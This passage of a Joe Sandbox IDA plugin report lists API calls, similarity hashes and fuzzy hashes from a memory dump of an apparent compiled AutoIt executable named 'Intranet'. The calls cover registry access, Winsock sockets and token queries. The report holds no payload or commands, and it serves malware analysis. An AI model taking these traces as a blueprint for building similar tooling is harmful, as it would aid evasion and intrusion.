  • Part of subcall function 00521602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005216ED
• RegDeleteKeyW.ADVAPI32(?,?), ref: 005216B5
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 00526911
• GetWindowLongW.USER32(?,000000F0,?,?,?,0052A461,?,?,?,?,?), ref: 00526944
• GetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 00526979
• SendMessageW.USER32(?,000000F1,00000000,00000000,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 005269AB
• SendMessageW.USER32(?,000000F1,00000001,00000000,?,?,?,0052A461,?,?,?,?), ref: 005269D5
• GetWindowLongW.USER32(?,000000F0,?,?,?,0052A461,?,?,?,?), ref: 005269E6
• SetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0052A461,?,?,?,?), ref: 00526A00
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE2CA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE2F0
• #2.WSOCK32(00000000), ref: 004FE2F3
• #2.WSOCK32(?), ref: 004FE311
• #6.OLEAUT32(?), ref: 004FE31A
• StringFromGUID2.OLE32(?,?,00000028), ref: 004FE33F
• #2.WSOCK32(?), ref: 004FE34D
Similarity
• API ID: ByteCharMultiWide$FromString
• String ID:
• API String ID: 1211328463-0
APIs
  • Part of subcall function 00518475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
• #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005168B1
• #111.WSOCK32(00000000), ref: 005168C0
• #12.WSOCK32(00000000,8004667E,00000000), ref: 005168F9
• #4.WSOCK32(00000000,?,00000010), ref: 00516902
• #111.WSOCK32 ref: 0051690C
• #3.WSOCK32(00000000), ref: 00516935
• #12.WSOCK32(00000000,8004667E,00000000), ref: 0051694E
Similarity
• API ID: #111
• String ID:
• API String ID: 568940515-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE3A5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE3CB
• #2.WSOCK32(00000000), ref: 004FE3CE
• #2.WSOCK32 ref: 004FE3EF
• #6.OLEAUT32 ref: 004FE3F8
• StringFromGUID2.OLE32(?,?,00000028), ref: 004FE412
• #2.WSOCK32(?), ref: 004FE420
Similarity
• API ID: ByteCharMultiWide$FromString
• String ID:
• API String ID: 1211328463-0
APIs
Strings
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C57
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C64
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C6F
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C7E
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C8A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004F0817,?,?,00000000,00000000), ref: 00509EE8
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004F0817,?,?,00000000,00000000), ref: 00509EFF
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14), ref: 00509F0F
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14), ref: 00509F20
                                                                            • LockResource.KERNEL32(004F0817,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14,00000000), ref: 00509F2F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 004C9D16
                                                                              • Part of subcall function 004C33B7: EncodePointer.KERNEL32(00000000), ref: 004C33BA
                                                                              • Part of subcall function 004C33B7: __initp_misc_winsig.LIBCMT ref: 004C33D5
                                                                              • Part of subcall function 004C33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004CA0D0
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004CA0E4
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004CA0F7
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004CA10A
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004CA11D
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004CA130
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004CA143
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004CA156
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004CA169
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004CA17C
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004CA18F
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004CA1A2
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004CA1B5
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004CA1C8
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004CA1DB
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004CA1EE
                                                                            • __mtinitlocks.LIBCMT ref: 004C9D1B
                                                                            • __mtterm.LIBCMT ref: 004C9D24
                                                                              • Part of subcall function 004C9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004C9D29,004C7EFD,0055CD38,00000014), ref: 004C9E86
                                                                              • Part of subcall function 004C9D8C: _free.LIBCMT ref: 004C9E8D
                                                                              • Part of subcall function 004C9D8C: DeleteCriticalSection.KERNEL32(00560C00,?,?,004C9D29,004C7EFD,0055CD38,00000014), ref: 004C9EAF
                                                                            • __calloc_crt.LIBCMT ref: 004C9D49
                                                                            • __initptd.LIBCMT ref: 004C9D6B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C9D72
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00568290,004B5328), ref: 004B5109
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B512A
                                                                            • ShowWindow.USER32(00000000), ref: 004B513E
                                                                            • ShowWindow.USER32(00000000), ref: 004B5147
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,004C4282,?), ref: 004C41D3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C41DA
                                                                            • EncodePointer.KERNEL32(00000000), ref: 004C41E6
                                                                            • DecodePointer.KERNEL32(00000001,004C4282,?), ref: 004C4203
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004C41A8), ref: 004C42A8
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C42AF
                                                                            • EncodePointer.KERNEL32(00000000), ref: 004C42BA
                                                                            • DecodePointer.KERNEL32(004C41A8), ref: 004C42D5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004A21B8
                                                                            • GetWindowRect.USER32(?,?), ref: 004A21F9
                                                                            • ScreenToClient.USER32(?,?), ref: 004A2221
                                                                            • GetClientRect.USER32(?,?), ref: 004A2350
                                                                            • GetWindowRect.USER32(?,?), ref: 004A2369
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            • Opcode ID: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                            • Instruction ID: 218a91d4eb6c0319ffa1af2d62ab31c90bd99fa625fb934e04e6809cc67c314e
                                                                            • Opcode Fuzzy Hash: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                            • Instruction Fuzzy Hash: AB61CD3050025AABCB11EF61C895EFE3BA8BF86308F44455EF8556B1E2DB38EC55CB64
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052091D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052095D
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00520980
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005209A9
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005209EC
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005209F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
                                                                            • Opcode ID: 8f7b12a29d4e0150e1af3ba520a428a425a0f53bf46231c1ff6b8dcdd3284b5a
                                                                            • Instruction ID: 7adfa4f554ffc1a68ccf27bfe2e5dbec70ce1ceba4ea7eb42b8a0affb505de2e
                                                                            • Opcode Fuzzy Hash: 8f7b12a29d4e0150e1af3ba520a428a425a0f53bf46231c1ff6b8dcdd3284b5a
                                                                            • Instruction Fuzzy Hash: 85517831208204AFD704EB65C895E6FBBA8FF86314F04491EF586872E2DB35E945CB52
                                                                            APIs
                                                                            • GetMenu.USER32(?,00000001,00000000), ref: 00525E38
                                                                            • GetMenuItemCount.USER32(00000000), ref: 00525E6F
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00525E97
                                                                            • GetMenuItemID.USER32(?,?), ref: 00525F06
                                                                            • GetSubMenu.USER32(?,?), ref: 00525F14
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00525F65
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                            • String ID:
                                                                            • API String ID: 650687236-0
                                                                            • Opcode ID: da298ea21eff73da7735a7b6d373bf03baa23e646d6e5a62b8f8433cc8b37524
                                                                            • Instruction ID: e818a847c417a677e326745ee542415817d8956754b58761d88e0651e0890912
                                                                            • Opcode Fuzzy Hash: da298ea21eff73da7735a7b6d373bf03baa23e646d6e5a62b8f8433cc8b37524
                                                                            • Instruction Fuzzy Hash: 2A51EE75A00625AFCF11EF65C945AAEBBB4FF49320F01409AF901BB391DB74AE41CB90
                                                                            APIs
                                                                            • #8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 004FF6A2
                                                                            • #9.WSOCK32(00000013,?,?,?,?,00000024), ref: 004FF714
                                                                            • #9.WSOCK32(00000000,?,?,?,?,00000024), ref: 004FF76F
                                                                            • _memmove.LIBCMT ref: 004FF799
                                                                            • #9.WSOCK32(?,?,?,?,?,00000024), ref: 004FF7E6
                                                                            • #12.WSOCK32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 004FF814
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: e423e7a1d37836b1d663eb6be5411656be913b5b55ddcb8339e16f3047782733
                                                                            • Instruction ID: 78632d9a1c2a569df2186211d568c1160b0803809b0ad11701b3f3a688314cdb
                                                                            • Opcode Fuzzy Hash: e423e7a1d37836b1d663eb6be5411656be913b5b55ddcb8339e16f3047782733
                                                                            • Instruction Fuzzy Hash: 97516BB5A00209EFCB14DF58C884AAAB7F8FF4C354B15856AEA59DB340D734E915CFA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005029FF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,000000FF,000000FF,00567890,00000000,000BED90), ref: 00502A4A
                                                                            • IsMenu.USER32(00000000), ref: 00502A6A
                                                                            • CreatePopupMenu.USER32(00567890,00000000,000BED90), ref: 00502A9E
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00502AFC
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00502B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: c1ab9b0f45011d540af1750c28fb0a694c9abe9b4798dcbd4162594da0051be9
                                                                            • Instruction ID: 30238dfe84391b625cc2dfaa9c80583ed9c4f297ec7458ffd1e6a418cad9d7a6
                                                                            • Opcode Fuzzy Hash: c1ab9b0f45011d540af1750c28fb0a694c9abe9b4798dcbd4162594da0051be9
                                                                            • Instruction Fuzzy Hash: B8518A70A0030AABDF25CF68D88CAAEBFF4BF54314F144559E8159B2E1D7B09948CB51
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 004A1B76
                                                                            • GetWindowRect.USER32(?,?), ref: 004A1BDA
                                                                            • ScreenToClient.USER32(?,?), ref: 004A1BF7
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004A1C08
                                                                            • EndPaint.USER32(?,?), ref: 004A1C52
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 289382d4ae695bac9b298573aa0794e037c27842e876ea3833477dbc77ef5d81
                                                                            • Instruction ID: 9f91efdcd93faf02f7f48ab8ecc102f917aaa050600450996bcb4c318c5a584a
                                                                            • Opcode Fuzzy Hash: 289382d4ae695bac9b298573aa0794e037c27842e876ea3833477dbc77ef5d81
                                                                            • Instruction Fuzzy Hash: 4741D330104304AFD710DF24CC98FAB7BE8EB6A364F14056AF595872B2C774A849EB65
                                                                            APIs
                                                                            • ShowWindow.USER32(005677B0,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BD84
                                                                            • EnableWindow.USER32(?,00000000,?,0052BC1A,?,?), ref: 0052BDA8
                                                                            • ShowWindow.USER32(005677B0,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BE08
                                                                            • ShowWindow.USER32(?,00000004,?,0052BC1A,?,?), ref: 0052BE1A
                                                                            • EnableWindow.USER32(?,00000001,?,0052BC1A,?,?), ref: 0052BE3E
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BE61
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: ad0d60f4c606b99c151f71a2886394acd63d4fdf8d9b7ee3afbfacb76c3db9d7
                                                                            • Instruction ID: ab1b1785db60de98812d51a22a69ce86bf756ce90502c045ca83d0983aa7e63a
                                                                            • Opcode Fuzzy Hash: ad0d60f4c606b99c151f71a2886394acd63d4fdf8d9b7ee3afbfacb76c3db9d7
                                                                            • Instruction Fuzzy Hash: 36416D74600264AFEB26CF28D49ABD47FF5FF06314F1941A9EA488F2E2C731A845CB51
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 00517796
                                                                              • Part of subcall function 0051406C: GetWindowRect.USER32(?,?), ref: 0051407F
                                                                            • GetDesktopWindow.USER32(?,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177C0
                                                                            • GetWindowRect.USER32(00000000,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177C7
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177F9
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 00517825
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000,?,?,?,?,?,?,?,0051550C,?,?,00000000), ref: 00517883
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 19fecc456908191b07051b3836ad1dcb6175b6a3bfd3c52c68266e00ea20398d
                                                                            • Instruction ID: 6533f1846fab84d52083740770f172c68b3770959f614f1495deadc0d4e1973b
                                                                            • Opcode Fuzzy Hash: 19fecc456908191b07051b3836ad1dcb6175b6a3bfd3c52c68266e00ea20398d
                                                                            • Instruction Fuzzy Hash: A231AF7250830AABD720DF58C849F9BBBA9FB88314F000919F58997191DA30E949CBA2
                                                                            APIs
                                                                            • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005169C7
                                                                            • #111.WSOCK32(00000000), ref: 005169D6
                                                                            • #2.WSOCK32(00000000,?,00000010), ref: 005169F2
                                                                            • #13.WSOCK32(00000000,00000005), ref: 00516A01
                                                                            • #111.WSOCK32(00000000), ref: 00516A1B
                                                                            • #3.WSOCK32(00000000,00000000), ref: 00516A2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111
                                                                            • String ID:
                                                                            • API String ID: 568940515-0
                                                                            • Opcode ID: 2f2f997f62c96897b67709e4abddf6fc23ae41df1abf72d34dd5ace7a7c5c4b2
                                                                            • Instruction ID: f8d08601c2db2a3f75789a69d023c4fa58ce946a272777853320bda3000f1d6a
                                                                            • Opcode Fuzzy Hash: 2f2f997f62c96897b67709e4abddf6fc23ae41df1abf72d34dd5ace7a7c5c4b2
                                                                            • Instruction Fuzzy Hash: CB210130200200AFDB00EF64CD99AAEBBA9FF94724F10855DF956A73D1CB74AC45DB90
                                                                            APIs
                                                                              • Part of subcall function 004F8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F8CDE
                                                                              • Part of subcall function 004F8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F8CE8
                                                                              • Part of subcall function 004F8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F8CF7
                                                                              • Part of subcall function 004F8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F8CFE
                                                                              • Part of subcall function 004F8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F8D14
                                                                            • GetLengthSid.ADVAPI32(?,00000000,004F904D), ref: 004F9482
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004F948E
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F9495
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004F94AE
